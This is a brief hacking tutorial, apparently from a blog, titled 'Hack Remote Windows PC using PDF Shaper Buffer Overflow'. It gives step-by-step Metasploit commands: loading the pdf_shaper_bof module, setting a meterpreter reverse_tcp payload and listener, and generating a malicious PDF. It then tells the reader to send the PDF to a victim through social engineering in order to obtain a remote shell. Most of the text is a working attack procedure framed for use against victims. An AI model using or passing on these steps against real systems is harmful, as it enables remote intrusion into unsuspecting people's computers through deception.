Hack Remote Windows PC using PDF Shaper Buffer Overflow
PDF Shaper is prone to security vulnerability when processing PDF files. The vulnerability appear when we use Convert PDF to Image and use a specially crafted PDF file. This Metasploit module has been tested successfully on Win Xp, Win 7, Win 8, and Win 10.
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
Now type use exploit/windows/fileformat/pdf_shaper_bof
msf exploit (pdf_shaper_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (pdf_shaper_bof)>set lhost 192.168.1.16 (IP of Local Host)
msf exploit (pdf_shaper_bof)>exploit
After we successfully generate the malicious pdf File, it will stored on your local computer
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.16
Now send your msf.pdf files to victim using any social engineering technique. Now when the victim will use PDF Shaper tool and click on PDF to Image option.
Now it will show Add File Option, victim will select the msf.pdf and click on Convert option.
Now you will get the meterpreter of victim PC.